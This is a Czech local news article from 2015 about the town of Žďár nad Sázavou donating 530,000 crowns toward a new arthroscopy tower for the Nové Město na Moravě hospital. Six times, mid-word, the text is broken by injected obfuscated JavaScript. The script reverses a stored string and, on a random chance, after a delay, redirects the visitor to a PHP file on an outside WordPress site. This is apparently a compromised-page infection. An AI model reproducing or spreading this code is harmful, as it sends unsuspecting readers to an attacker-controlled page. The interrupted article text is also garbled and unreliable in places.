Rainbow page separator

Ve Žďáře podepsali smlouvu o daru na artroskopickou věž

Pondělí, 17. srpna 2015

Nemocnice Nové Město na Moravě

Žďár nad Sázavou / Smlouvu o daru v rámci projektu Naše nemocnice, která zahrnuje finanční dar novoměstské nemocnici ve výši 530 tisíc korun, podepsal starosta Žďáru nad Sázavou Zdeněk Navrátil s ředitelkou nemocnice Věrou Palečkovou.
Peníze budou použity na pořízení nové artroskopické věže, která začne koncem roku sloužit v or[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}topedickém oddělení novoměstské nemocnice. Zařízení nahradí stávající zastaralou věž, která už má „odslouženo“ dvanáct let.
Žďárská radnice na pořízení věže nemocnici věnovala tři sta tisíc korun a dalších 230 tisíc korun činí příspěvek některých žďárských firem. Ty peníze městu poskytly formou účelového daru s tím, že je radnice společně i se svým třistatisícovým příspěvkem věnuje nemocnici.
„Žďár sice nemocnici nemá, nicméně jsme chtěli ukázat, že tu novoměstskou bereme jako svoji,“ konsta[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toval iniciá[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tor projektu a současně i žďárský radní Radek Černý.
Soutěž na dodavatele technického zařízení bude podle ředitelky Věry Palečkové vypsána v září. „S dodávkou přístroje počítáme v lis[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}topadu,“ uvedla ředitelka.
Přístroj pro artroskopické operace umožňuje chirurgům operovat klouby miniinvazivní me[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}todou – bez [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toho, aby museli provést rozsáhlý zákrok. Tím dochází mimo jiné ke zkrácení doby hojení, takže pacient se může dříve navrátit do běžného života.